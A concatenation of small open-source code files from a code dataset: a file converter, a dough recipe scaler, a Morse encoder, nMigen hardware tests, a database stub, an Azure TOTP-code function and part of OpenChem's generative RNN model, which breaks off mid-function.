try:
extension_list = {"pdf": "pdf", "png": "png", "jpg": "jpeg", "gif": "gif", "tif": "tif", "bmp": "bmp", "eps": "eps"}
file_extension = extension_list[options.convert_type]
return file_name, file_extension
except KeyError:
print(f"[-] File type {options.convert_type} to be converted to was not found. Please check the extension before trying again, (e.g. png or jpg).")
else:
print(f"[-] File {options.file} not found. Please check the name and extension before trying again. (e.g. sample.pdf).")
exit()
except Exception as msg:
report_issue(msg)
def convert_file(options, file_name, file_extension): # converts files to other formats
try:
print(f"[+] Converting {options.file} to {file_name}.{options.convert_type}")
pdf = wi(filename=options.file, resolution=300)
pdfimage = pdf.convert(file_extension)
i=1
for img in pdfimage.sequence:
page = wi(image=img)
page.save(filename=f"{file_name}{str(i)}.{options.convert_type}")
i +=1
print("[+] File was successfully converted.")
except Exception as msg:
exception_ghostscript = 'FailedToExecuteCommand `"gswin64c.exe"'
exception_ghostscript_compare = str(msg)
if exception_ghostscript == exception_ghostscript_compare[:38]:
print("[-] File was not successfully converted.\n")
print("There is an issue with ghostscript. Reinstall or download latest version and try again.")
print("Visit: https://github.com/PeanutTheAdmin/FileConverter for install instructions.\n")
else:
print("[-] File was not successfully converted.")
report_issue(msg)
def report_issue(msg):
print(f"[BUG] {msg}\n")
print("To report this issue go to: https://github.com/PeanutTheAdmin/FileConverter/issues")
print("When reporting this issue include the output after [BUG]\n")
def main(): # Main Function
options = get_arguments()
file_name, file_extension = check_file(options)
convert_file(options, file_name, file_extension)
if __name__ == "__main__":
main()
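# Example invocation (a sketch based on the argparse flags above):
#   python main.py --file sample.pdf --convert_type png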
``` |
{
"source": "josh-hadley/dough-doh",
"score": 4
} |
#### File: josh-hadley/dough-doh/dough-doh.py
```python
import argparse
from collections import namedtuple
Ingredient = namedtuple("Ingredient", ["name", "amount", "units"])
MASTER_RECIPE = [
Ingredient("Water", 101.66, "g"),
Ingredient("Fresh Yeast", 0.5, "g"),
Ingredient("Dry Yeast", 0.2, "g"),
Ingredient("Olive Oil", 3.33, "ml"),
Ingredient("00 Flour", 166.66, "g"),
Ingredient("Sea Salt", 4, "g"),
]
def scale_recipe(multiplier: int, fresh: bool=False):
if fresh:
base = filter(lambda x: x.name != "Dry Yeast", MASTER_RECIPE)
else:
base = filter(lambda x: x.name != "Fresh Yeast", MASTER_RECIPE)
scaled = [
Ingredient(x.name, round(x.amount * multiplier, 2), x.units)
for x in base]
return scaled
def format_recipe(recipe, multiplier: int) -> str:
t = f"INGREDIENTS FOR {multiplier} DOUGH BALL{'S' if multiplier != 1 else ''}\n"
t += "-" * (len(t) - 1) + "\n"
s = "\n".join(
[f"{x.name:<8}\t{x.amount:>7,.1f} {x.units:<3}" for x in recipe])
return t + s + "\n"
def main():
parser = argparse.ArgumentParser()
parser.add_argument("multiplier", type=int, default=1)
parser.add_argument("-f", "--fresh-yeast", action="store_true")
args = parser.parse_args()
scaled = scale_recipe(args.multiplier, args.fresh_yeast)
print(format_recipe(scaled, args.multiplier))
if __name__ == '__main__':
main()
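# Example invocation (a sketch based on the argparse setup above):
#   python dough-doh.py 4 --fresh-yeast   # scale the master recipe to 4 dough balls using fresh yeast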
``` |
{
"source": "joshhamlin/Morse-code",
"score": 4
} |
#### File: joshhamlin/Morse-code/morse.py
```python
def toMorse(Main):
MorseFinAry = []
Tarry = list(Main)
for char in Tarry:
if char.lower() == "a":
MorseFinAry.append(".- ")
elif char.lower() == "b":
MorseFinAry.append("-... ")
elif char.lower() == "c":
MorseFinAry.append("-.-. ")
elif char.lower() == 'd':
MorseFinAry.append("-.. ")
elif char.lower() == 'e':
MorseFinAry.append(". ")
elif char.lower() == 'f':
MorseFinAry.append("..-. ")
elif char.lower() == 'g':
MorseFinAry.append("--. ")
elif char.lower() == 'h':
MorseFinAry.append(".... ")
elif char.lower() == 'i':
MorseFinAry.append(".. ")
elif char.lower() == 'j':
MorseFinAry.append(".--- ")
elif char.lower() == 'k':
MorseFinAry.append("-.- ")
elif char.lower() == 'l':
MorseFinAry.append(".-.. ")
elif char.lower() == 'm':
MorseFinAry.append("-- ")
elif char.lower() == 'n':
MorseFinAry.append("-. ")
elif char.lower() == 'o':
MorseFinAry.append("--- ")
elif char.lower() == 'p':
MorseFinAry.append(".--. ")
elif char.lower() == 'q':
MorseFinAry.append("--.- ")
elif char.lower() == 'r':
MorseFinAry.append(".-. ")
elif char.lower() == 's':
MorseFinAry.append("... ")
elif char.lower() == 't':
MorseFinAry.append("- ")
elif char.lower() == 'u':
MorseFinAry.append("..- ")
elif char.lower() == 'v':
MorseFinAry.append("...- ")
elif char.lower() == 'w':
MorseFinAry.append(".-- ")
elif char.lower() == 'x':
MorseFinAry.append("-..- ")
        elif char.lower() == 'y':
MorseFinAry.append("-.-- ")
elif char.lower() == 'z':
MorseFinAry.append("--.. ")
elif char == "1":
MorseFinAry.append(".---- ")
elif char == "2":
MorseFinAry.append("..--- ")
elif char == "3":
MorseFinAry.append("...-- ")
elif char == '4':
MorseFinAry.append("....- ")
elif char == '5':
MorseFinAry.append("..... ")
elif char == '6':
MorseFinAry.append("-.... ")
elif char == '7':
MorseFinAry.append("--... ")
elif char == '8':
MorseFinAry.append("---.. ")
elif char == '9':
MorseFinAry.append("----. ")
elif char == '0':
MorseFinAry.append("----- ")
elif char == '.':
MorseFinAry.append(".-.-.- ")
elif char == ',':
MorseFinAry.append("--..-- ")
elif char == "?":
MorseFinAry.append("..--..")
elif char == '/':
MorseFinAry.append("-..-.")
elif char == '@':
MorseFinAry.append(".--.-. ")
elif char == " ":
MorseFinAry.append("| ")
else:
print("char not valid")
return MorseFinAry
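# e.g. toMorse("SOS") returns ['... ', '--- ', '... '], which joins to "... --- ... "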
while True:
print("Type [help] if you are unsure how to use this\n")
InMain = input("Type a string or morse code -->")
if InMain == "[help]":
print("When typing in strings just type as you normally would\n")
print("Case will not effect the out put because mores code does not account for case\n")
print("example --> Type a string or morse code -->I would like to read this in morse code \n")
print("you can use the following in your sting |a - z|, |0 - 9|, '.', ',', '?', '/' and '@' ")
    # Works well for converting to Morse code
Pans = toMorse(InMain)
print(''.join(Pans))
    # Works; we just need to handle unusual input and touch up the UI
``` |
{
"source": "joshhead/gcn-bluetooth",
"score": 2
} |
#### File: gcn-bluetooth/joybusutils/test_tinymodule.py
```python
from nmigen import Module
from nmigen.sim.pysim import Simulator, Tick
from tinymodule import TinyModule
from nmigen.test.utils import FHDLTestCase
import unittest
CLOCK_PERIOD = 1/12_000_000
class TinyModuleTest(FHDLTestCase):
def setUp(self):
self.tinymodule = TinyModule()
self.sim = Simulator(self.tinymodule)
self.sim.add_clock(CLOCK_PERIOD)
def test_output_starts_at_0(self):
def process():
self.assertEqual((yield self.tinymodule.output), 0)
self.sim.add_sync_process(process)
self.sim.run()
def test_output_toggles_after5_ticks(self):
def process():
for _ in range(4):
yield Tick()
self.assertEqual((yield self.tinymodule.output), 0)
for _ in range(32):
yield Tick()
self.assertEqual((yield self.tinymodule.output), 1)
self.sim.add_sync_process(process)
self.sim.run()
if __name__ == "__main__":
unittest.main()
```
#### File: gcn-bluetooth/joybusutils/tinymodule.py
```python
from nmigen import Elaboratable, Signal, Module
from nmigen.sim.pysim import Simulator, Tick
from tabulate import tabulate
class TinyModule(Elaboratable):
def __init__(self):
self.counter = Signal(5)
self.output = Signal()
def ports(self):
return [self.output]
def elaborate(self, platform):
m = Module()
m.d.sync += self.counter.eq(self.counter + 1)
# Once high, output should stay high.
with m.If(self.output == 1):
m.d.comb += self.output.eq(1)
# Otherwise, wait for 5 clock ticks
with m.Elif(self.counter == 5):
m.d.comb += self.output.eq(1)
return m
if __name__ == "__main__":
tinymodule = TinyModule()
sim = Simulator(tinymodule)
sim_results = []
def process():
# Enough ticks for the counter to overflow
for i in range(35):
sim_results.append([i, (yield tinymodule.counter), (yield tinymodule.output)])
yield Tick()
sim.add_sync_process(process)
# 12mhz clock
sim.add_clock(1/12_000_000)
with sim.write_vcd("tinymodule_sim.vcd", "tinymodule_sim.gtkw", traces=tinymodule.ports()):
sim.run()
print(tabulate(sim_results, headers=["Clock", "Counter", "Output"]))
``` |
{
"source": "Josh-Hegewald/uci-statnlp",
"score": 4
} |
#### File: uci-statnlp/hw1/classify.py
```python
def train_classifier(X, y):
"""Train a classifier using the given training data.
    Trains a logistic regression on the input data, selecting hyperparameters with a small grid search.
"""
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
cls = LogisticRegression()
param_grid = {
'C': [100],
'penalty': ['l2'],
'max_iter': list(range(400, 600, 200)),
'solver': ['lbfgs']
}
param_search = GridSearchCV(cls, param_grid=param_grid, refit=True, verbose=3, cv=3)
param_search.fit(X, y)
print("printing grid scores")
print(param_search.cv_results_)
import matplotlib.pyplot as plt
print(param_grid['C'])
print(param_search.cv_results_['mean_test_score'])
plt.plot(param_grid['C'], param_search.cv_results_['mean_test_score'])
import seaborn as sns
return param_search
def evaluate(X, yt, cls):
"""Evaluated a classifier on the given labeled data using accuracy."""
from sklearn import metrics
yp = cls.predict(X)
acc = metrics.accuracy_score(yt, yp)
print(" Accuracy", acc)
``` |
{
"source": "joshherr-quic/tvm",
"score": 2
} |
#### File: ethosu/te/identity.py
```python
from tvm import te
from .dma import read_compute, write_compute
def identity_compute(
ifm: te.Tensor,
lut: te.Tensor,
ifm_scale: float,
ifm_zero_point: int,
ofm_scale: float,
ofm_zero_point: int,
activation: str,
) -> te.Tensor:
"""A compute operator for the NPU identity operator.
Parameters
----------
ifm : te.Tensor
The Input Feature Map tensor (IFM).
lut : te.Tensor
The look-up table values to use if activation is "LUT", "TANH" or "SIGMOID".
ifm_scale : float
The quantization scale for the Input Feature Map tensor.
ifm_zero_point : int
The quantization zero point for the Input Feature Map tensor.
ofm_scale : float
The quantization scale for the Output Feature Map tensor.
ofm_zero_point : int
The quantization zero point for the Output Feature Map tensor.
activation : str
The activation function to use.
"NONE" - no activation function.
"TANH" - tanh activation function.
"SIGMOID" - sigmoid activation function.
"LUT" - use a look-up table to perform the activation function.
Returns
-------
te.Tensor
The Output Feature Map tensor.
"""
dmaed_ifm = read_compute(ifm, ifm_zero_point, ifm_scale)
id_attrs = {"op": "ethosu_identity", "activation": activation}
# This is a trick to insert the LUT tensor into the TE graph if LUT is present
lut_expr = (lut[0] + lut[255]).astype(ifm.dtype) if activation in ("TANH", "LUT") else 0
# Add the LUT tensor to the attributes to be able to later tell which tensor is the LUT
if activation in ("TANH", "LUT"):
id_attrs["lut"] = lut
identity = te.compute(
ifm.shape,
lambda *i: (dmaed_ifm(*i) + lut_expr).astype(ifm.dtype),
name="ethosu_identity",
attrs=id_attrs,
)
dmaed_ofm = write_compute(identity, ofm_zero_point, ofm_scale)
return dmaed_ofm
``` |
{
"source": "JoshhhBailey/rman-toiletroll",
"score": 2
} |
#### File: JoshhhBailey/rman-toiletroll/shaderTesting.py
```python
import prman
import sys
import sys,os.path,subprocess
def CreateCube(width = 1.0, height = 1.0, depth = 1.0):
# The following function is from:
# <NAME>,. 2020. Introduction to Renderman and Python. [online]
# Available from: https://nccastaff.bournemouth.ac.uk/jmacey/msc/renderman/lectures/Lecture1/
# Accessed [23 March 2021]
w = width / 2.0
h = height / 2.0
d = depth / 2.0
# Rear
face = [-w, -h, d, -w, h, d, w, -h, d, w, h, d]
ri.Patch("bilinear", {'P':face})
# Front
face = [-w, -h, -d, -w, h, -d, w, -h, -d, w, h, -d]
ri.Patch("bilinear", {'P':face})
# Left
face = [-w, -h, -d, -w, h, -d, -w, -h, d, -w, h, d]
ri.Patch("bilinear", {'P':face})
# Right
face = [w, -h, -d, w, h, -d, w, -h, d, w, h, d]
ri.Patch("bilinear", {'P':face})
# Bottom
face = [w, -h, d, w, -h, -d, -w, -h, d, -w, -h, -d]
ri.Patch("bilinear", {'P':face})
# Top
face = [w, h, d, w, h, -d, -w, h, d, -w, h, -d]
ri.Patch("bilinear", {'P':face})
def CompileShader(shader):
# The following function is from:
# <NAME>., 2018. Lecture4Shaders. [online]
# Available from: https://github.com/NCCA/Renderman/blob/master/Lecture4Shaders/Bands/bands.py
# Accessed [25 March 2021]
if os.path.isfile(shader + ".oso") != True or os.stat(shader + ".osl").st_mtime - os.stat(shader + ".oso").st_mtime > 0:
print("compiling shader %s" %(shader))
try:
subprocess.check_call(["oslc", shader + ".osl"])
except subprocess.CalledProcessError:
sys.exit("shader compilation failed")
if __name__ == "__main__":
CompileShader("shaders/testShader")
ri = prman.Ri() # Create RenderMan interface instance
ri.Begin("__render") # Begin .rib and pass to renderer
ri.Display("toiletroll.exr", "framebuffer", "rgba") # File, Buffer, Colour Channels
ri.Format(512, 512, 1) # Width, Height, Aspect Ratio
# Camera coordinate system
ri.Projection(ri.PERSPECTIVE)
ri.Translate(0, 0, 2)
# World coordinate system
ri.WorldBegin()
# Create surface
ri.TransformBegin()
ri.AttributeBegin()
ri.Attribute ("identifier", {"name": "Surface"})
ri.Attribute('displacementbound',
{
'sphere' : [1],
'coordinatesystem' : ['object']
})
ri.Pattern('testShader','testShader',
{
})
ri.Bxdf("PxrSurface", "roll",
{
"reference color diffuseColor" : ["testShader:resultRGB"],
})
cube_width = 5
cube_height = 5
cube_depth = 0.5
CreateCube(cube_width, cube_height, cube_depth)
ri.AttributeEnd()
ri.TransformEnd()
ri.WorldEnd()
ri.End() # End .rib
``` |
{
"source": "joshhighet/ransomwatch",
"score": 3
} |
#### File: joshhighet/ransomwatch/geckodrive.py
```python
import time
import requests
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.common.exceptions import WebDriverException
from sharedutils import checktcp
from sharedutils import randomagent
from sharedutils import sockshost, socksport
from sharedutils import stdlog, dbglog, errlog, honk
requests.packages.urllib3.disable_warnings()
def main(webpage):
'''
main function to fetch webpages with javascript rendering supporting onion routing
'''
stdlog('geckodriver: ' + 'starting to fetch ' + webpage)
dbglog('geckodriver: ' + 'configuring options, user agent & cert preacceptance')
options = Options()
options.headless = True
options.set_preference('dom.max_script_run_time', 15)
options.add_argument("start-maximized")
options.accept_untrusted_certs = True
options.set_preference('network.http.timeout', 20000)
options.set_preference("general.useragent.override", randomagent())
if '.onion' in webpage:
stdlog('geckodriver: ' + 'appears we are dealing with an onionsite')
if not checktcp(sockshost, socksport):
honk('geckodriver: ' + 'socks proxy not available and required for onionsites!')
else:
stdlog(
'geckodriver: ' + 'assumed torsocks proxy found - tcp://' \
+ sockshost + ':' + str(socksport)
)
stdlog('geckodriver: ' + 'configuring proxy settings')
options.set_preference('network.proxy.type', 1)
options.set_preference('network.proxy.socks', sockshost)
options.set_preference('network.proxy.socks_port', int(socksport))
options.set_preference("network.proxy.socks_remote_dns", True)
try:
stdlog('geckodriver: ' + 'starting webdriver')
driver = webdriver.Firefox(options=options)
stdlog('geckodriver: ' + 'fetching webpage')
driver.get(webpage)
# set the number of seconds to wait before working with the DOM
sleeptz = 5
stdlog('geckodriver: ' + 'waiting ' + str(sleeptz) + ' seconds to render elements')
time.sleep(sleeptz)
#if 'lockbitapt' in webpage:
# stdlog('geckodriver: ' + 'special detected, waiting for captcha')
# driver.add_cookie({"name": "ddosproteck", "value": "lol"})
# driver.find_element_by_css_selector('button').click()
'''
get html from dom after js processing and page rendering complete
'''
source = driver.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
stdlog('geckodriver: ' + 'fetched')
except WebDriverException as e:
# if e contains neterror?e=dnsNotFound, then we are dealing with an onion site failing hsdir
if 'about:neterror?e=dnsNotFound' in str(e):
errlog('geckodriver: ' + 'socks request unable to route to host, check hsdir resolution status!')
elif 'about:neterror?e=netTimeout' in str(e):
errlog('geckodriver: ' + 'geckodriver socks request timed out!')
else:
errlog('geckodriver: ' + 'error: ' + str(e))
driver.quit()
stdlog('geckodriver: ' + 'webdriver quit')
return None
if driver:
driver.quit()
stdlog('geckodriver: ' + 'webdriver quit')
return source
```
#### File: joshhighet/ransomwatch/markdown.py
```python
import os
import time
from datetime import datetime as dt
from sharedutils import gcount
from sharedutils import openjson
from sharedutils import postcount
from sharedutils import hostcount
from sharedutils import groupcount
from sharedutils import postssince
from sharedutils import parsercount
from sharedutils import onlinecount
from sharedutils import postslast24h
from sharedutils import version2count
from sharedutils import poststhisyear
from sharedutils import currentmonthstr
from sharedutils import mounthlypostcount
#from sharedutils import headlesscount
#from sharedutils import countcaptchahosts
from sharedutils import stdlog, dbglog, errlog, honk
from plotting import trend_posts_per_day, plot_posts_by_group, pie_posts_by_group
def suffix(d):
return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
def custom_strftime(fmt, t):
return t.strftime(fmt).replace('{S}', str(t.day) + suffix(t.day))
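# e.g. custom_strftime('%B {S}, %Y', dt(2021, 10, 3)) -> 'October 3rd, 2021'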
friendly_tz = custom_strftime('%B {S}, %Y', dt.now()).lower()
def writeline(file, line):
'''write line to file'''
with open(file, 'a') as f:
f.write(line + '\n')
f.close()
def groupreport():
'''
create a list with number of posts per unique group
'''
stdlog('generating group report')
posts = openjson('posts.json')
# count the number of posts by group_name within posts.json
group_counts = gcount(posts)
# sort the group_counts - descending
sorted_group_counts = sorted(group_counts.items(), key=lambda x: x[1], reverse=True)
stdlog('group report generated with %d groups' % len(sorted_group_counts))
return sorted_group_counts
def mainpage():
'''
main markdown report generator - used with github pages
'''
stdlog('generating main page')
uptime_sheet = 'docs/README.md'
with open(uptime_sheet, 'w') as f:
f.close()
writeline(uptime_sheet, '')
writeline(uptime_sheet, '## summary')
writeline(uptime_sheet, '_' + friendly_tz + '_')
writeline(uptime_sheet, '')
writeline(uptime_sheet, 'currently tracking `' + str(groupcount()) + '` groups across `' + str(hostcount()) + '` relays & mirrors - _`' + str(onlinecount()) + '` currently online_')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '⏲ there have been `' + str(postslast24h()) + '` posts within the `last 24 hours`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '🦈 there have been `' + str(mounthlypostcount()) + '` posts within the `month of ' + currentmonthstr() + '`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '🪐 there have been `' + str(postssince(90)) + '` posts within the `last 90 days`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '🏚 there have been `' + str(poststhisyear()) + '` posts within the `year of ' + str(dt.now().year) + '`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '🦕 there have been `' + str(postcount()) + '` posts `since the dawn of ransomwatch`')
writeline(uptime_sheet, '')
writeline(uptime_sheet, 'there are `' + str(parsercount()) + '` custom parsers indexing posts')
#writeline(uptime_sheet, 'there are `' + str(parsercount()) + '` active parsers, `' + str(headlesscount()) + '` of which using headless browsers - _`' + str(countcaptchahosts()) + '` groups have recently introduced captchas_')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '_`' + str(version2count()) + '` sites using v2 onion services are no longer indexed - [support.torproject.org](https://support.torproject.org/onionservices/v2-deprecation/)_')
writeline(uptime_sheet, '')
writeline(uptime_sheet, '> see the project [README](https://github.com/thetanz/ransomwatch#ransomwatch--) for backend technicals')
def indexpage():
index_sheet = 'docs/INDEX.md'
with open(index_sheet, 'w') as f:
f.close()
groups = openjson('groups.json')
writeline(index_sheet, '# 📚 index')
writeline(index_sheet, '')
header = '| group | title | status | last seen | location |'
writeline(index_sheet, header)
writeline(index_sheet, '|---|---|---|---|---|')
for group in groups:
stdlog('generating group report for ' + group['name'])
for host in group['locations']:
stdlog('generating host report for ' + host['fqdn'])
if host['available'] is True:
#statusemoji = '⬆️ 🟢'
statusemoji = '🟢'
lastseen = ''
elif host['available'] is False:
# iso timestamp converted to yyyy/mm/dd
lastseen = host['lastscrape'].split(' ')[0]
#statusemoji = '⬇️ 🔴'
statusemoji = '🔴'
if host['title'] is not None:
title = host['title'].replace('|', '-')
else:
title = ''
line = '| [' + group['name'] + '](https://ransomwatch.telemetry.ltd/#/profiles?id=' + group['name'] + ') | ' + title + ' | ' + statusemoji + ' | ' + lastseen + ' | ' + host['fqdn'] + ' |'
writeline(index_sheet, line)
def sidebar():
'''
create a sidebar markdown report
'''
stdlog('generating sidebar')
sidebar = 'docs/_sidebar.md'
# delete contents of file
with open(sidebar, 'w') as f:
f.close()
writeline(sidebar, '- [home](README.md)')
writeline(sidebar, '- [group index](INDEX.md)')
writeline(sidebar, '- [recent posts](recentposts.md)')
writeline(sidebar, '- [stats & graphs](stats.md)')
writeline(sidebar, '- [group profiles](profiles.md)')
stdlog('sidebar generated')
def statspage():
'''
create a stats page in markdown containing the matplotlib graphs
'''
stdlog('generating stats page')
statspage = 'docs/stats.md'
# delete contents of file
with open(statspage, 'w') as f:
f.close()
writeline(statspage, '# 📊 stats')
writeline(statspage, '')
    writeline(statspage, '_timestamp association commenced october 21_')
writeline(statspage, '')
writeline(statspage, '')
writeline(statspage, '')
writeline(statspage, '')
writeline(statspage, '')
writeline(statspage, '')
stdlog('stats page generated')
def recentposts(top):
'''
create a list the last X posts (most recent)
'''
stdlog('finding recent posts')
posts = openjson('posts.json')
# sort the posts by timestamp - descending
sorted_posts = sorted(posts, key=lambda x: x['discovered'], reverse=True)
# create a list of the last X posts
recentposts = []
for post in sorted_posts:
recentposts.append(post)
if len(recentposts) == top:
break
stdlog('recent posts generated')
return recentposts
def recentpage():
'''create a markdown table for the last 100 posts based on the discovered value'''
fetching_count = 100
stdlog('generating recent posts page')
recentpage = 'docs/recentposts.md'
# delete contents of file
with open(recentpage, 'w') as f:
f.close()
writeline(recentpage, '# 📰 recent posts')
writeline(recentpage, '')
writeline(recentpage, '_last `' + str(fetching_count) + '` posts_')
writeline(recentpage, '')
writeline(recentpage, '| date | title | group |')
writeline(recentpage, '|---|---|---|')
    # fetch the 100 most recent posts and add them to the markdown table
for post in recentposts(fetching_count):
# show friendly date for discovered
date = post['discovered'].split(' ')[0]
# replace markdown tampering characters
title = post['post_title'].replace('|', '-')
group = post['group_name'].replace('|', '-')
grouplink = '[' + group + '](https://ransomwatch.telemetry.ltd/#/profiles?id=' + group + ')'
line = '| ' + date + ' | `' + title + '` | ' + grouplink + ' |'
writeline(recentpage, line)
stdlog('recent posts page generated')
def profilepage():
'''
create a profile page for each group in their unique markdown files within docs/profiles
'''
stdlog('generating profile pages')
profilepage = 'docs/profiles.md'
# delete contents of file
with open(profilepage, 'w') as f:
f.close()
writeline(profilepage, '# 🐦 profiles')
writeline(profilepage, '')
groups = openjson('groups.json')
for group in groups:
writeline(profilepage, '## ' + group['name'])
writeline(profilepage, '')
if group['captcha'] is True:
writeline(profilepage, ':warning: _has a captcha_')
writeline(profilepage, '')
if group['parser'] is True:
writeline(profilepage, '_parsing : `enabled`_')
writeline(profilepage, '')
else:
writeline(profilepage, '_parsing : `disabled`_')
writeline(profilepage, '')
# add notes if present
if group['meta'] is not None:
writeline(profilepage, '_`' + group['meta'] + '`_')
writeline(profilepage, '')
if group['javascript_render'] is True:
writeline(profilepage, '> fetching this site requires a headless browser for javascript processing')
writeline(profilepage, '')
if group['geckodriver'] is True:
writeline(profilepage, '> fetching this site uses geckodriver/selenium')
writeline(profilepage, '')
if group['profile'] is not None:
for profile in group['profile']:
writeline(profilepage, '- ' + profile)
writeline(profilepage, '')
writeline(profilepage, '| title | available | version | last visit | fqdn')
writeline(profilepage, '|---|---|---|---|---|')
for host in group['locations']:
# convert date to ddmmyyyy hh:mm
date = host['lastscrape'].split(' ')[0]
date = date.split('-')
date = date[2] + '/' + date[1] + '/' + date[0]
time = host['lastscrape'].split(' ')[1]
time = time.split(':')
time = time[0] + ':' + time[1]
if host['title'] is not None:
line = '| ' + host['title'].replace('|', '-') + ' | ' + str(host['available']) + ' | ' + str(host['version']) + ' | ' + time + ' ' + date + ' | `' + host['fqdn'] + '` |'
writeline(profilepage, line)
else:
line = '| none | ' + str(host['available']) + ' | ' + str(host['version']) + ' | ' + time + ' ' + date + ' | `' + host['fqdn'] + '` |'
writeline(profilepage, line)
writeline(profilepage, '')
writeline(profilepage, '| post | date |')
writeline(profilepage, '|---|---|')
posts = openjson('posts.json')
for post in posts:
if post['group_name'] == group['name']:
date = post['discovered'].split(' ')[0]
date = date.split('-')
date = date[2] + '/' + date[1] + '/' + date[0]
line = '| ' + '`' + post['post_title'].replace('|', '') + '`' + ' | ' + date + ' |'
writeline(profilepage, line)
writeline(profilepage, '')
stdlog('profile page for ' + group['name'] + ' generated')
stdlog('profile page generation complete')
def main():
stdlog('generating doco')
mainpage()
indexpage()
sidebar()
recentpage()
statspage()
profilepage()
# if posts.json has been modified within the last 45 mins, assume new posts discovered and recreate graphs
if os.path.getmtime('posts.json') > (time.time() - (45 * 60)):
stdlog('posts.json has been modified within the last 45 mins, assuming new posts discovered and recreating graphs')
trend_posts_per_day()
plot_posts_by_group()
pie_posts_by_group()
else:
stdlog('posts.json has not been modified within the last 45 mins, assuming no new posts discovered')
``` |
{
"source": "joshhighet/sharedmfa",
"score": 2
} |
#### File: sharedmfa/get-mfa-code/__init__.py
```python
import os
import json
import logging
import datetime
import urllib.parse as urlparse
from urllib.parse import parse_qs
import azure.functions as func
import pyotp
from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
from azure.cosmosdb.table.tableservice import TableService
from azure.cosmosdb.table.models import Entity
#fetch keyvault name from environment variable (function configuration setting)
kvname = os.environ["KEY_VAULT_NAME"]
kvfqdn = f"https://{kvname}.vault.azure.net"
kv = SecretClient(vault_url=kvfqdn, credential=DefaultAzureCredential())
#using the AzWebJobs environment variable, connect to azure table storage
stor_acc_conn_string = os.environ['AzureWebJobsStorage']
tables = TableService(connection_string=stor_acc_conn_string)
def main(req: func.HttpRequest) -> func.HttpResponse:
"""fetch uuid from inbound url query parameter"""
uuid = req.params.get('uuid')
if not uuid:
try:
req_body = req.get_json()
except ValueError:
pass
else:
uuid = req_body.get('uuid')
#if the uuid has been identified
if uuid:
#get otp secret object from key vault by reference to uuid
otpauthkv = kv.get_secret(uuid)
#get otp secret value from object
totpseed = otpauthkv.value
#calculate pin from otp secret
otpgen = pyotp.TOTP(totpseed)
totp = otpgen.now()
#calculate time-to-live of pin (30 second lifespan)
seconds_left = otpgen.interval - datetime.datetime.now().timestamp() % otpgen.interval
miliseconds_left = seconds_left * 1000
#form json response and respond
data = {}
data['otp'] = totp
data['expires'] = miliseconds_left
json_data = json.dumps(data)
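        # e.g. json_data == '{"otp": "492039", "expires": 17000.0}' (illustrative values; expires is the remaining lifetime of the code in milliseconds)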
return func.HttpResponse(json_data)
else:
return func.HttpResponse(
"no uuid recieved.",
status_code=400
)
``` |
{
"source": "joshhills/dissertation-project",
"score": 3
} |
#### File: source/shared/database.py
```python
from couchbase.cluster import Cluster
from couchbase.cluster import PasswordAuthenticator
class Database:
def store_job_state(self, product_id):
"""
Log that scraping for a product has begun.
:param product_id:
"""
        raise NotImplementedError("Class %s doesn't implement store_job_state()" % self.__class__.__name__)
class Couchbase(Database):
def __init__(self):
# Define connection parameters.
authenticator = PasswordAuthenticator('root', 'administrator')
self.cluster = Cluster('couchbase://localhost')
self.cluster.authenticate(authenticator=authenticator)
def store_job_state(self, product_id):
cluster = self.cluster.open_bucket('job')
# Learn how to do things with this.
return
``` |
{
"source": "joshhochuli/OpenChem",
"score": 2
} |
#### File: openchem/layers/stack_augmentation.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class StackAugmentation(nn.Module):
def __init__(self, stack_width, stack_depth, in_features, use_cuda):
super(StackAugmentation, self).__init__()
self.use_cuda = use_cuda
self.stack_width = stack_width
self.stack_depth = stack_depth
self.in_features = in_features
self.stack_controls_layer = nn.Linear(in_features=in_features,
out_features=3)
self.stack_input_layer = nn.Linear(in_features=in_features,
out_features=self.stack_width)
def forward(self, input_val, prev_stack):
batch_size = prev_stack.size(0)
controls = self.stack_controls_layer(input_val.squeeze(0))
controls = F.softmax(controls, dim=1)
controls = controls.view(-1, 3, 1, 1)
stack_input = self.stack_input_layer(input_val)
stack_input = F.tanh(stack_input)
stack_input = stack_input.permute(1, 0, 2)
zeros_at_the_bottom = torch.zeros(batch_size, 1, self.stack_width)
if self.use_cuda:
zeros_at_the_bottom = torch.tensor(zeros_at_the_bottom.cuda(),
requires_grad=True)
else:
zeros_at_the_bottom = torch.tensor(zeros_at_the_bottom,
requires_grad=True)
a_push, a_pop, a_no_op = controls[:, 0], controls[:, 1], controls[:, 2]
stack_down = torch.cat((prev_stack[:, 1:], zeros_at_the_bottom), dim=1)
stack_up = torch.cat((stack_input, prev_stack[:, :-1]), dim=1)
new_stack = a_no_op * prev_stack + a_push * stack_up + \
a_pop * stack_down
return new_stack
def init_stack(self, batch_size):
result = torch.zeros(batch_size, self.stack_depth, self.stack_width)
if self.use_cuda:
return torch.tensor(result.cuda(), requires_grad=True)
else:
return torch.tensor(result, requires_grad=True)
```
#### File: openchem/models/GenerativeRNN.py
```python
from openchem.models.openchem_model import OpenChemModel
from openchem.layers.stack_augmentation import StackAugmentation
from openchem.data.utils import seq2tensor, cut_padding
import torch
import numpy as np
class GenerativeRNN(OpenChemModel):
def __init__(self, params):
super(GenerativeRNN, self).__init__(params)
self.has_stack = params['has_stack']
if self.has_stack:
self.Stack = StackAugmentation(use_cuda=self.use_cuda,
**self.params['stack_params'])
self.embedding = self.params['embedding']
self.embed_params = self.params['embedding_params']
self.Embedding = self.embedding(self.embed_params)
self.encoder = self.params['encoder']
self.encoder_params = self.params['encoder_params']
self.Encoder = self.encoder(self.encoder_params, self.use_cuda)
self.mlp = self.params['mlp']
self.mlp_params = self.params['mlp_params']
self.MLP = self.mlp(self.mlp_params)
def forward(self, inp_seq, eval=False):
"""Generator forward function."""
if eval:
self.eval()
else:
self.train()
batch_size = inp_seq.size()[0]
seq_len = inp_seq.size()[1]
n_classes = self.MLP.hidden_size[-1]
result = torch.zeros(batch_size, seq_len, n_classes,
requires_grad=True)
